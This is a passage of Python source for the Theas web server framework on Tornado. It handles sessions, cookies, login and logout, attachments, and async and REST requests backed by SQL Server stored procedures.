# template_str does not need to be merged with data
buf = template_str
if this_resource and this_resource.on_after:
this_function = getattr(TheasCustom, this_resource.on_after)
if this_function is not None:
handled = this_function(self, args, kwargs)
return buf, redirect_to, history_go_back, handled
@run_on_executor
def do_post_background(self, *args, **kwargs):
return self.do_post(args, kwargs)
@tornado.gen.coroutine
def wait_for_session(self, seconds_to_wait=10, write_to_cookie=True):
this_sess = None
orig_cookie_session_token = self.cookie_st
# We might have a session token in a cookie. But we might also have a session token in
# a form field, or in an HTTP header. Which one do we trust? Rationale: We'd like the
# most explicit one to be used, i.e.: query string, form field, header, cookie in that
# order.
# But in the case of an async request from a stale browser request the session token
# provided in the form field might be old, and the cookie value might be new.
# The browser really must update the session token in the form if an async response
# provides an updated cookie value.
'''
if self.get_arguments(SESSION_COOKIE_NAME):
# Look for session token in request
this_session_token = self.get_argument(SESSION_COOKIE_NAME)
if USE_SECURE_COOKIES:
this_session_token = tornado.web.decode_signed_value(COOKIE_SECRET, SESSION_COOKIE_NAME, this_session_token)
elif SESSION_HEADER_NAME in self.request.headers:
this_session_token = self.request.headers[SESSION_HEADER_NAME]
else:
# fall back to cookie
this_session_token = orig_cookie_session_token
'''
# The rudimentary partial support for session tokens via forms or headers was removed on 9/7/2018, pending
# reconsideration of the best way to handle this.
this_session_token = orig_cookie_session_token
give_up = False
failed_to_lock = False
start_waiting = time.time()
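# Poll for the session: if another request currently holds the session lock, sleep briefly
# and retry until the lock is obtained or roughly seconds_to_wait seconds have elapsed.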
while this_sess is None and not give_up:
this_sess, failed_to_lock = ThSession.get_session(session_token=this_session_token,
handler_guid=self.handler_guid,
defer_sql=True,
comments='ThHandler.wait_for_session')
if failed_to_lock and this_sess is None:
yield tornado.gen.sleep(.500)
give_up = (time.time() - start_waiting) > seconds_to_wait  # time.time() is in seconds
else:
give_up = True
if this_sess:
this_sess.current_handler = self
this_sess.current_xsrf_form_html = self.xsrf_form_html()
if USE_SESSION_COOKIE and write_to_cookie:
# next_url = '/'
if orig_cookie_session_token != this_sess.session_token:
self.cookie_st = this_sess.session_token
ThSession.cls_log('Cookies',
'Updating cookie {} wait_for_session() gave different token ({} vs {})'.format(
SESSION_COOKIE_NAME, orig_cookie_session_token, this_sess.session_token))
# silently re-authenticate if needed and there is a user cookie
if not this_sess.logged_in and REMEMBER_USER_TOKEN:
# try to auto-login if there is a user cookie
if self.cookie_usertoken:
ThSession.cls_log('Sessions', 'Reauthenticating user from usertoken cookie')
this_sess.authenticate(user_token=self.cookie_usertoken)
if not this_sess.logged_in:
ThSession.cls_log('Sessions', 'FAILED to reauthenticate user from usertoken cookie')
self.cookie_usertoken = None
ThSession.cls_log('Cookies',
'Updating cookie {} wait_for_session() could not authenticate original usertoken'.format(
USER_COOKIE_NAME))
else:
self.cookie_st = None
else:
ThSession.cls_log('Sessions', 'Failed to obtain session in wait_for_session()')
self.write_cookies()
this_sess.comments = None
return this_sess
@tornado.gen.coroutine
def head(self, *args, **kwargs):
# Partial support for HTTP HEAD requests
# Currently only supports cached public resources that are in cache
# try to find required resource
resource_code = args[0]
resource = None
if resource_code and resource_code.count('.') >= 2:
# A versioned filename, i.e. my.ver.23.css for version #23 of my.css
# We just want to cut out the version, and return the unversioned
# filename as the resource code (i.e. my.css)
# That is, Theas will always / only serve up the most recent version
# of a resource. There is not support for serving up a particular
# historical version. The version number in the file name is merely
# for the browser's benefit, so that we can "cache bust" / have the
# browser request the latest version even if it has an old version in
# cache.
# For this reason, we don't really need to inspect the resources.
# We need only manipulate the resource_code to strip out the version
# number.
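# e.g. a request for "style.ver.23.css" (hypothetical filename) is served as the resource "style.css".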
segments = resource_code.split('.')
if len(segments) >= 3 and 'ver' in segments:
ver_pos = segments.index('ver')
if ver_pos > 0:
resource_code = '.'.join(segments[:ver_pos]) + '.' + '.'.join(segments[ver_pos + 2:])
self.set_header('Server', 'Theas/01')
th_session = None
# Look up response info.
# Will not return info for dynamic requests (only static requests for SysWebResource or attachment)
response_info = self.get_response_info(resource_code, th_session, sessionless=True)
if response_info is None:
self.send_error(status_code=405)
else:
self.set_header('accept-ranges', 'bytes') # but not really...
self.set_header('Content-Type', response_info.content_type)
self.set_header('Content-Length', response_info.content_length)
self.set_header('Date', response_info.current_date)
self.set_header('Expires', response_info.content_expires)
self.set_header('Cache-Control', response_info.cache_control)
self.set_header('Last-Modified', response_info.date_updated)
self.set_header('Content-Disposition', 'inline; filename="{}"'.format(response_info.content_filename))
if response_info.etag:
self.set_header('Etag', response_info.etag)
@tornado.gen.coroutine
def post(self, *args, **kwargs):
# MAIN ENTRY POINT FOR HTTP POST REQUEST
ThSession.cls_log('POST', '*******************************')
self.session = yield self.wait_for_session()
self.session.log('POST Request', 'Received request for: {}'.format(self.request.path))
self.session.log('Authentication', 'User is logged in' if self.session.logged_in else 'User is NOT logged in')
this_finished = False
handled = False
buf = None
redirect_to = None
history_go_back = False
if self.session is not None:
# This is a post. The next page may be specified in a form field theas:th:NextPage.
if not self.session.logged_in and self.get_arguments('u') and self.get_arguments('pw'):
# The requested page is the login screen
error_message = ''
if USE_WORKER_THREADS:
success, error_message = yield self.authenticate_user_background(self.get_argument('u'),
self.get_argument('pw'))
else:
success, error_message = self.session.authenticate(username=self.get_argument('u'),
password=self.get_argument('pw'))
# if not self.session.authenticate(username=self.get_argument('u'), password=self.get_argument('pw')):
if not success:
# authentication failed, so send the login screen
self.session.theas_page.set_value('theas:th:ErrorMessage', 'Error: {}.'.format(error_message))
buf = self.session.build_login_screen()
self.write(buf)
else:
# Authentication succeeded, so continue with redirect
# self.session.theas_page.set_value('theas:th:ErrorMessage', '')
if self.session.bookmark_url:
self.session.log('Proceeding with bookmarked page', self.session.bookmark_url)
self.get_template(self.session.bookmark_url)
self.session.bookmark_url = None
else:
self.session.log('Response', 'Sending clientside redir after login page success')
self.write(self.session.clientside_redir())
if not handled:
# Handle the actual form processing here. When done, we will persist session data and redirect.
if USE_WORKER_THREADS:
buf, redirect_to, history_go_back, handled = yield self.do_post_background(args, kwargs)
else:
buf, redirect_to, history_go_back, handled = self.do_post(args, kwargs)
if not handled:
if redirect_to is not None:
if self.cookies_changed:
# must perform a client-side redirect in order to set cookies
self.session.log('Session', 'Sending client-side redirect to: ({}) after do_post()'.format(
redirect_to))
self.write(self.session.clientside_redir(redirect_to))
self.session.finished()
else:
# can send a normal redirect, since no cookies need to be written
this_finished = True
self.session.log('Session',
'Sending normal redirect to: ({}) after do_post()'.format(redirect_to))
self.session.finished()
self.redirect(redirect_to)
else:
if history_go_back and self.session is not None:
if len(self.session.history) > 0:
this_history_entry = self.session.history.pop()
self.session.theas_page.set_value('theas:th:NextPage', this_history_entry['PageName'])
self.session.log('Response', 'Sending clientside redir due to history_go_back')
this_finished = True
buf = self.session.clientside_redir()
if buf is None:
buf = '<html><body>No content to send in ThHandler.post()</body></html>'
self.write(buf)
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
self.session.log('Response', 'Sending response')
else:
self.write('<html><body>Error: cannot process request without a valid session</body></html>')
if not handled and not this_finished:
if self.session and self.session.locked:
self.session.finished()
self.finish()
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
##########################################################
# MAIN ENTRY POINT FOR HTTP GET REQUEST
##########################################################
global G_cached_resources
if self.session:
self.session.comments = 'ThHandler.get'
# do everything needed to process an HTTP GET request
def write_log(sess, category, *args):
if sess is not None:
sess.log(category, *args)
else:
ThSession.cls_log(category, *args)
handled = False
buf = None
redirect_to = None
history_go_back = False
# try to find required resource
resource_code = None
resource = None
request_path = None
if len(args) > 0:
request_path = args[0]
if request_path is not None and request_path.split('/')[0] == 'r':
# Special case: an "r" as the first segment of the path, such as:
# r/resourcecode/aaa/bbb
# indicates that the second segment is to be the resource code.
# This allows URLs such as /r/img/myimg.jpg to be handled dynamically: the resource img is
# loaded, and then myimg.jpg is passed in. (Otherwise the resource would be taken to be
# img/myimg.jpg
resource_code = request_path.split('/')[1]
else:
resource_code = request_path
if resource_code and resource_code.count('.') >= 2:
# A versioned filename, i.e. my.ver.23.css for version #23 of my.css
# We just want to cut out the version, and return the unversioned
# filename as the resource code (i.e. my.css)
# That is, Theas will always / only serve up the most recent version
# of a resource. There is not support for serving up a particular
# historical version. The version number in the file name is merely
# for the browser's benefit, so that we can "cache bust" / have the
# browser request the latest version even if it has an old version in
# cache.
# For this reason, we don't really need to inspect the resources.
# We need only manipulate the resource_code to strip out the version
# number.
segments = resource_code.split('.')
if len(segments) >= 3 and 'ver' in segments:
ver_pos = segments.index('ver')
if ver_pos > 0:
resource_code = '.'.join(segments[:ver_pos]) + '.' + '.'.join(segments[ver_pos + 2:])
# note: self.session is probably not yet assigned
# A request for a cached public resource does not need a database connection.
# We can serve up such requests without even checking the session.
# If we do not check the session, multiple simultaneous requests can be processed without serializing on the session lock.
if resource_code or self.session:
resource = G_cached_resources.get_resource(resource_code, self.session, none_if_not_found=True)
# see if the resource is public (so that we can serve up without a session)
if resource is not None and resource.exists and resource.is_public and \
not resource.render_jinja_template and \
not resource.on_before and not resource.on_after:
# note: resource.data will usually be str but might be bytes
ThSession.cls_log('CachedGET', 'Serving up cached resource', resource_code)
buf = resource.data
else:
# Retrieve or create a session. We want everyone to have a session (even if they are not authenticated)
# We need to use the session's SQL connection to retrieve the resource
ThSession.cls_log('GET', '*******************************')
ThSession.cls_log('GET', args[0])
self.session = yield self.wait_for_session()
if self.session is None:
ThSession.cls_log('GET Error', 'No session. Cannot continue to process request.')
self.write('<html><body>Error: cannot process request without a valid session</body></html>')
else:
# we have a session, but are not necessarily logged in
self.session.log('GET', 'Have session')
self.session.log('GET', 'Received request for: {}'.format(self.request.path))
self.session.log('Auth', 'User is logged in' if self.session.logged_in else 'User is NOT logged in')
# Take logged-in users back to where they were
if not resource_code and self.session.logged_in:
resource = self.session.current_resource
if not resource_code and DEFAULT_RESOURCE_CODE and not self.session.logged_in:
# resource_code was not provided and user is not logged in: use default resource
# If the user is logged in, we want get_resource to select the appropriate
# resource for the user.
resource_code = DEFAULT_RESOURCE_CODE
if resource is None or not resource.exists:
# Call get_resources again, this time with a session
resource = G_cached_resources.get_resource(resource_code, self.session, none_if_not_found=True)
if resource is None or not resource.exists:
# If the user is logged in, but resource_code is not specified, we explicitly set get_default_resource
# so that the stored proc can look up the correct resource for us.
# This change was made 9/21/2017 to correct a problem that led to 404 errors resulting in serving
# up the default resource.
self.session.log('Get Resource', 'Logged in?', self.session.logged_in)
self.session.log('Get Resource', 'resource_code', resource_code if resource_code is not None else 'None')
resource = G_cached_resources.get_resource(resource_code, self.session, none_if_not_found=True,
get_default_resource=self.session.logged_in)
if resource is not None and resource.exists and resource.resource_code != LOGIN_RESOURCE_CODE and \
resource.render_jinja_template:
# We may have retrieved a cached resource. Set current_resource.
self.session.current_resource = resource
if resource is not None and resource.exists:
if resource.on_before:
this_function = getattr(TheasCustom, resource.on_before)
if this_function:
handled = this_function(self, args, kwargs)
if resource.requires_authentication and not self.session.logged_in:
if not self.session.logged_in:
# still not logged in: present login screen
self.session.bookmark_url = resource.resource_code
# self.session.bookmark_url = self.request.path.rsplit('/', 1)[1]
self.session.current_resource = resource
# NOTE: this needs further thought.
# Sometimes it is nice to send the login screen in response to a request
# for an auth-required resource if the user is not logged in.
# Other times, we might prefer to send a 404 error, or to navigate
# to index, etc. (consider <img src="xxx">, <audio>, etc.)
buf = self.session.build_login_screen()
write_log(self.session, 'Response', 'Sending login screen')
if buf is None and (not resource.requires_authentication or self.session.logged_in):
if resource.api_stored_proc or resource.render_jinja_template:
buf, redirect_to, history_go_back = self.do_render_response(this_resource=resource)
else:
# note: resource.data will usually be str but might be bytes
buf = resource.data
if resource.on_after:
this_function = getattr(TheasCustom, resource.on_after)
if this_function:
handled = this_function(self, args, kwargs)
if not handled:
if redirect_to is not None:
if self.cookies_changed:
# must perform a client-side redirect in order to set cookies
self.write(self.session.clientside_redir(redirect_to))
self.session.finished()
else:
# can send a normal redirect, since no cookies need to be written
self.session.finished()
buf = None
self.redirect(redirect_to)
else:
if history_go_back:
pass
else:
if buf is None:
write_log(self.session, 'Response',
'Sending 404 error in response to HTTP GET request for {}'.format(resource_code))
self.send_error(status_code=404)
if buf is not None:
write_log(self.session, 'Response', 'Sending response to HTTP GET request for {}'.format(resource_code))
self.write(buf)
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
if resource is not None and resource.is_public:
self.set_header('Cache-Control', ' max-age=900') # let browser cache for 15 minutes
else:
self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
self.add_header('Cache-Control', 'post-check=0, pre-check=0')
self.add_header('Pragma', 'no-cache')
if self.filename is not None:
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(self.filename))
self.set_header('Content-Disposition', 'inline; filename=' + self.filename)
elif resource is not None and resource.filename:
if resource.filetype:
self.set_header('Content-Type', resource.filetype)
else:
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(resource.filename))
self.set_header('Content-Disposition', 'inline; filename=' + resource.filename)
self.finish()
if self.session is not None:
self.session.comments = None
self.session.finished()
self.session.log('Request',
'At end, Current Resource is {}'.format(
self.session.current_resource.resource_code
if self.session.current_resource
else 'Not Assigned!'
))
# def write_error(self, status_code, **kwargs):
# msg = ''
# if self.this_sess.sql_conn == None:
# msg = 'There is no database connection. '
# msg = msg + e.args[0] + ' ' + e.message
# print('Error: ' + msg)
# self.write('<html><body>Sorry, you encountered an error. Error message: ' + msg + '</body></html>')
# self.finish()
# #if 'exc_info' in kwargs and issubclass(kwargs['exc_info'][0], ForbiddenException):
# # self.set_status(403)
# def _handle_request_exception(self, e):
@tornado.gen.coroutine
def options(self, resource_code=None, *args, **kwargs):
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Allow-Methods', 'POST, GET, PUT, DELETE')
self.set_header('Access-Control-Allow-Headers', 'X-Requested-With, Content-Type')
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Attach attachment handler
# -------------------------------------------------
class ThHandler_Attach(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
def retrieve_attachment(self):
# Do everything that is needed to process a request for a quest attachment
self.session.log('Attach', 'Retrieving quest attachment')
attachment = None
attachment_guid = None
filename = None
filetype = None
buf = None
attachment_guid = self.get_argument('guid', default=None)
if attachment_guid is None:
attachment_guid = self.request.path.split('/')[-1]
if attachment_guid.lower() == 'attach':
attachment_guid = None
if attachment_guid is not None:
# Get attachment data from database
proc = ThStoredProc('theas.spgetAttachment', self.session)
if proc.is_ok:
proc.bind(attachment_guid, _mssql.SQLCHAR, '@AttachmentGUID')
proc_result = proc.execute(fetch_rows=False)
for row in proc.th_session.sql_conn:
filename = row['Filename']
buf = row['AttachmentData']
if 'Filetype' in row:
filetype = row['Filetype']
if buf is not None:
attachment = {}
attachment['filename'] = filename
attachment['data'] = buf
attachment['filetype'] = filetype
return attachment
@run_on_executor
def retrieve_attachment_background(self):
return self.retrieve_attachment()
def retrieve_webresource(self):
global G_cached_resources
# Do everything that is needed to process a request for a sys web resource
self.session.log('Attach', 'Retrieving web resource')
resource_code = None
resource = None
if self.get_arguments('rc'):
resource_code = self.get_argument('rc')
resource = G_cached_resources.get_resource(resource_code, self.session, for_public_use=True)
return resource
@run_on_executor
def retrieve_webresource_background(self):
return self.retrieve_webresource()
@tornado.gen.coroutine
def get(self, *args, **kwargs):
# MAIN ENTRY POINT FOR ATTACH HTTP GET REQUEST
# retrieve or create session
ThSession.cls_log('Attach', '*******************************')
ThSession.cls_log('Attach', args[0])
self.session = yield self.wait_for_session(write_to_cookie=False)
if self.session is not None:
self.session.log('Attach', 'Have session')
self.session.log('Attach',
'Current Resource is {}'.format(
self.session.current_resource.resource_code
if self.session.current_resource
else 'Not Assigned!'
))
if self.get_arguments('rc'):
if USE_WORKER_THREADS:
resource = yield self.retrieve_webresource_background()
else:
resource = self.retrieve_webresource()
self.session.log('Attach', 'Sending SysWebResource')
self.write(resource.data)
if resource.filetype:
self.set_header('Content-Type', resource.filetype)
else:
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(resource.filename))
self.set_header('Content-Disposition', 'inline; filename=' + resource.filename)
else:
# if not self.session.logged_in:
# self.send_error(status_code=404)
# self.session.log('Response', 'Sending 404 for attachment request due to no login')
# else:
if USE_WORKER_THREADS:
attachment = yield self.retrieve_attachment_background()
else:
attachment = self.retrieve_attachment()
if attachment is not None:
self.session.log('Attach', 'Sending attachment response')
self.write(attachment['data'])
if attachment['filetype']:
self.set_header('Content-Type', attachment['filetype'])
else:
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(attachment['filename']))
self.set_header('Content-Disposition', 'inline; filename=' + attachment['filename'])
self.finish()
else:
self.send_error(status_code=404)
self.session.finished()
self.session = None
def data_received(self, chunk):
pass
# -------------------------------------------------
# TestThreadedHandler sample thread handler
# -------------------------------------------------
class TestThreadedHandler(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
def process_request(self):
# This will be executed in 'executor' pool.
return '<html><body>Made it to TestThreadedHandler.process_request!</body></html>'
@run_on_executor
def process_request_background(self):
return self.process_request()
@tornado.gen.coroutine
def get(self, *args, **kwargs):
if USE_WORKER_THREADS:
buf = yield self.process_request_background()
else:
buf = self.process_request()
self.write(buf)
self.finish()
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Logout logout handler
# -------------------------------------------------
class ThHandler_Logout(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
global G_sessions
if self.session is None:
self.session = yield self.wait_for_session()
nextURL = '/'
if self.session is not None:
# after logout, try to navigate to the same page
#if self.session.current_resource:
#nextURL = self.session.current_resource.resource_code
self.session.logout()
G_sessions.remove_session(self.session.session_token)
self.cookie_st = None
self.cookie_usertoken = None
self.write_cookies()
ThSession.cls_log('Cookies',
'Clearing cookies {} and {} in Logout'.format(SESSION_COOKIE_NAME, USER_COOKIE_NAME))
if self.cookies_changed:
self.write(self.session.clientside_redir(nextURL))
self.session.finished()
self.finish()
else:
self.redirect(nextURL)
self.session = None
# no self.finish needed, due to redirect
# self.finish()
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Login login handler
# -------------------------------------------------
class ThHandler_Login(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
global G_sessions
if self.session is None:
self.session = yield self.wait_for_session()
if self.session is not None:
self.session.logout()
G_sessions.remove_session(self.session.session_token)
self.cookie_st = None
self.cookie_usertoken = None
self.write_cookies()
ThSession.cls_log('Cookies',
'Clearing cookies {} and {} due to login'.format(SESSION_COOKIE_NAME, USER_COOKIE_NAME))
# self.redirect('/')
# self.session = None
##no self.finish needed, due to redirect
##self.finish()
self.session = yield self.wait_for_session()
buf = self.session.build_login_screen()
if self.session is not None:
self.session.log('Response', 'Sending login screen')
self.set_header('Content-Type', theas.Theas.mimetype_for_extension('login.html'))
self.set_header('Content-Disposition', 'inline; filename=' + 'login.html')
self.write_cookies()
self.write(buf)
self.finish()
if self.session is not None:
self.session.finished()
@tornado.gen.coroutine
def post(self, *args, **kwargs):
global G_sessions
if self.session is None:
self.session = yield self.wait_for_session()
success = False
error_message = ''
success, error_message = self.session.authenticate()
self.session.theas_page.set_value('theas:th:ErrorMessage', '{}'.format(error_message))
resource = G_cached_resources.get_resource(None, self.session, none_if_not_found=True,
get_default_resource=self.session.logged_in)
self.write_cookies()
next_page = ''
if self.session.logged_in:
if resource:
next_page = resource.resource_code
else:
next_page = DEFAULT_RESOURCE_CODE
else:
next_page = ''
buf = 'theas:th:LoggedIn={}&theas:th:ErrorMessage={}&theas:th:NextPage={}'.format(
'1' if self.session.logged_in else '0',
error_message,
next_page)
self.write(buf)
self.finish()
if self.session is not None:
self.session.finished()
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Async async (AJAX) handler
# -------------------------------------------------
class ThHandler_Async(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def post(self, *args, **kwargs):
global G_cached_resources
ThSession.cls_log('Async', '*******************************')
# Note: The async request is to a generic url of /async
# To determine what type of async request is being made, we look to the session's current_resource
# If current_resource is not set (such as due to a new session), we look to the Theas param
# th:CurrentPage
buf = ''
cmd = None
if self.get_arguments('cmd'):
cmd = self.get_argument('cmd')
if not cmd and self.get_body_arguments('cmd'):
cmd = self.get_body_argument('cmd')
self.session = yield self.wait_for_session()
if self.session is not None:
# update theas parameters based on this post...even if there is not an async stored proc
self.session.theas_page.process_client_request(request_handler=self, accept_any=False)
if self.session.current_resource is None:
if cmd == 'resetPassword':
resource_code = 'login'
else:
# Request may have provided Theas param 'th:CurrentPage'
# If session does not have current_resource set, trust 'th:CurrentPage'
# This allows us to process the async request in situations where the session went away due
# to timeout or server restart (assuming "remember me" / user token in cookie is enabled)
resource_code = self.session.theas_page.get_value('th:CurrentPage')
if resource_code is None or resource_code.strip() == '':
resource_code = None
if resource_code is not None:
self.session.current_resource = G_cached_resources.get_resource(resource_code, self.session)
self.session.log('Async:',
'Current Resource Code',
self.session.current_resource.resource_code
if self.session.current_resource
else 'No current resource for this session!')
self.process_uploaded_files()
# process uploaded files, even if there is no async proc
# do_log=(not cmd == 'heartbeat'))
if cmd == 'heartbeat':
if self.session is not None and self.session.sql_conn is not None:
self.write('sessionOK')
else:
self.write('invalidSession')
if self.session is not None:
self.session.finished()
if cmd == 'clearError':
if self.session is not None and self.session.sql_conn is not None:
self.session.theas_page.set_value('th:ErrorMessage', '')
self.write('clearError')
self.session.finished()
else:
async_proc_name = None
theas_params_str = ''
if self.session is not None:
self.session.log('Async', str(self.request.body_arguments))
try:
if self.session.current_resource is None:
# Something is wrong. Perhaps the async request came in before a resource had been served?
# This could happen if the TheasServer was restarted after a page was sent to the browser,
# Javascript on the page could submit an async requests...which we can't handle, because
# the original session no longer exists.
raise TheasServerError(
'There is a problem with your session. Click the "reload" button in your browser.' +
'|Invalid Session|Async request was received before a SysWebResource was served. Perhaps ' +
'your session expired, or the server was restarted after this page was loaded.')
else:
async_proc_name = self.session.current_resource.api_async_stored_proc
if async_proc_name:
# 5/11/2018 moved up, to as soon as we have a session. We want to update theas parameters
# even if there is no async stored proc.
# self.session.theas_page.process_client_request(request_handler=self, accept_any=False)
row_count = 0
form_params = self.request.body_arguments
# We want to serialize form data (excluding theas: fields)
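# e.g. produces "FirstName=Bob&Qty=3&" (hypothetical field names), with each value URL-encoded.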
form_params_str = ''
for key in form_params:
if not key.startswith('theas:'):
this_val = form_params[key]
if isinstance(this_val, list) and len(this_val) > 0:
this_val = this_val[0]
if isinstance(this_val, bytes):
this_val = this_val.decode('utf-8')
elif this_val:
this_val = str(this_val)
form_params_str = form_params_str + key + '=' + urlparse.quote(this_val) + '&'
# We also want to serialize all Theas controls
theas_params_str = self.session.theas_page.serialize()
self.session.log('Async', 'Async stored proc is: {}'.format(async_proc_name))
self.session.log('Async',
'Resource code is: {}'.format(self.session.current_resource.resource_code))
proc = ThStoredProc(async_proc_name, self.session)
if not proc.is_ok:
self.session.log('Async',
'ERROR: AsyncProcName {} is not valid. in ThHandler_Async.Post'.format(
async_proc_name))
else:
proc.refresh_parameter_list()
# if '@QuestGUID' in proc.parameter_list and self.session.theas_page.get_value('questGUID') is not None:
# proc.bind(self.session.theas_page.get_value('questGUID'), _mssql.SQLCHAR, '@QuestGUID')
# if '@StepGUID' in proc.parameter_list and self.session.theas_page.get_value('stepGUID') is not None:
# proc.bind(self.session.theas_page.get_value('stepGUID'), _mssql.SQLCHAR, '@StepGUID')
# if '@StepDefID' in proc.parameter_list and self.session.theas_page.get_value('stepDefID') is not None:
# proc.bind(self.session.theas_page.get_value('stepDefID'), _mssql.SQLCHAR, '@StepDefID')
if '@Command' in proc.parameter_list:
proc.bind(cmd, _mssql.SQLCHAR, '@Command')
if '@Document' in proc.parameter_list:
proc.bind(self.request.path.rsplit('/', 1)[1], _mssql.SQLCHAR, '@Document')
if '@HTTPParams' in proc.parameter_list:
proc.bind(self.request.query, _mssql.SQLCHAR, '@HTTPParams')
if '@FormParams' in proc.parameter_list:
proc.bind(form_params_str, _mssql.SQLCHAR, '@FormParams')
if '@TheasParams' in proc.parameter_list:
# proc.bind(theas_params_str, _mssql.SQLCHAR, '@TheasParams', output=proc.parameter_list['@TheasParams']['is_output'])
# Would prefer to use output parameter, but this seems not to be supported by FreeTDS. So
# we look to the resultset(s) returned by the stored proc instead.
proc.bind(theas_params_str, _mssql.SQLCHAR, '@TheasParams')
# Execute stored procedure
proc_result = proc.execute(fetch_rows=False)
# For the async stored proc, we are expecting it to return only a single resultset, and in most
# cases to return only a single row.
# We watch for a few special column names: TheasParams is a column the stored proc can use to
# return name/value pairs that should update the theas_page.controls. AsyncResponse is a column
# that the stored proc can use to return raw data that will be passed on to the browser as the
# response to the async request.
# If the async stored proc does return multiple rows, these column values from each row are
# concatenated together.
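# ErrorMessage (if any) is emitted as a theas:th:ErrorMessage pair, and any AsyncResponse
# content is appended; the resulting response buffer is '&'-delimited.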
theas_params_str = ''
if proc.th_session.sql_conn is not None:
theas_params_str = ''
buf = ''
for row in proc.th_session.sql_conn:
row_count += 1
if 'ErrorMessage' in row:
if not row['ErrorMessage'] is None and row['ErrorMessage'] != '':
# self.session.theas_page.set_value('theas:th:ErrorMessage',
# row['ErrorMessage'])
buf = 'theas:th:ErrorMessage=' + \
urlparse.quote(format_error(row['ErrorMessage'])) + '&'
if 'TheasParams' in row:
if row['TheasParams'] is not None:
theas_params_str = theas_params_str + row['TheasParams']
if 'AsyncResponse' in row:
if row['AsyncResponse'] is not None:
buf = buf + row['AsyncResponse'] + '&'
self.session.log('Async', '{row_count} rows returned by async stored proc'.format(
row_count=row_count))
if row_count == 0:
raise TheasServerError('No result row returned by async stored proc.')
changed_controls = None
if theas_params_str:
changed_controls = self.session.theas_page.process_client_request(
buf=theas_params_str, accept_any=True, from_stored_proc=True)
# let stored proc create any desired Theas controls, so these values can be used
# when rendering the template.
except TheasServerError as e:
# e = sys.exc_info()[0]
err_msg = e.value if hasattr(e, 'value') else e
buf = 'theas:th:ErrorMessage=' + urlparse.quote(format_error(err_msg))
except Exception as e:
# We would like to catch specific MSSQL exceptions, but these are declared with cdef
# in _mssql.pyx ... so they are not exported to python. Should these be declared
# with cpdef?
err_msg = e.text.decode('ascii') if hasattr(e, 'text') else str(e)
buf = 'theas:th:ErrorMessage=' + urlparse.quote(format_error(err_msg))
self.session.log('Async',
'ERROR when executing stored proc {}: {}'.format(
async_proc_name, err_msg))
if len(buf) > 0:
# stored proc specified an explicit response
self.write(buf)
else:
# stored proc did not specify an explicit response: send updated controls only
# if there are any, otherwise send all controls
# self.write(self.session.theas_page.serialize(control_list = changed_controls))
# send ALL Theas controls
self.write(self.session.theas_page.serialize())
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
self.session.finished()
self.session = None
self.finish()
@tornado.gen.coroutine
def get(self, *args, **kwargs):
return self.post(*args, **kwargs)
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_REST async (AJAX) handler
# -------------------------------------------------
'''
ThHandler_REST is similar to ThHandler_Async, except for:
1) Async is for calls associated with a normal page (i.e. page
is served up, and then subsequent async calls are made),
whereas REST is not associated with a normal page.
2) Async uses SysWebResources. REST does not. (REST
uses SysRequestTypes instead)
3) By default, REST will destroy the session after each
request.
4) REST does not do anything with Theas Params
'''
class ThHandler_REST(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
def get_rest_resource(self, resource_code, th_session):
this_resource = None
if resource_code:
resource_code = resource_code.strip()
if resource_code == '':
resource_code = None
# load resource from database
th_session.log('Resource', 'ThCachedResources.get_rest_resource fetching from database',
resource_code if resource_code is not None else 'None')
# Get SysWebResourcesdata from database
this_proc = ThStoredProc('theas.spgetSysWebResources', th_session)
if this_proc.is_ok:
# Note: we could check for existence of @GetDefaultResource down below to help with backwards
# compatibility ... but that would mean having to call refresh_parameter_list, which is
# unnecessary overhead.
# this_proc.refresh_parameter_list()
this_proc.bind(resource_code, _mssql.SQLCHAR, '@ResourceCode', null=(resource_code is None))
proc_result = this_proc.execute(fetch_rows=False)
assert proc_result, 'ThCachedResources.load_resource received error result from call to theas.spgetSysWebResources in the SQL database.'
row_count = 0
this_static_blocks_dict = {}
if this_proc.th_session.sql_conn is not None:
for row in this_proc.th_session.sql_conn:
row_count += 1
buf = row['ResourceText']
if not buf:
buf = row['ResourceData']
if buf:
buf = bytes(buf)
this_resource = ThResource()
this_resource.resource_code = row['ResourceCode']
this_resource.filename = row['Filename']
this_resource.data = buf
this_resource.api_stored_proc = row['APIStoredProc']
this_resource.api_async_stored_proc = row['APIAsyncStoredProc']
this_resource.api_stored_proc_resultset_str = row['ResourceResultsets']
this_resource.is_public = row['IsPublic']
this_resource.is_static = row['IsStaticBlock']
this_resource.requires_authentication = row['RequiresAuthentication']
this_resource.render_jinja_template = row['RenderJinjaTemplate']
this_resource.skip_xsrf = row['SkipXSRF']
if 'OnBefore' in row:
this_resource.on_before = row['OnBefore']
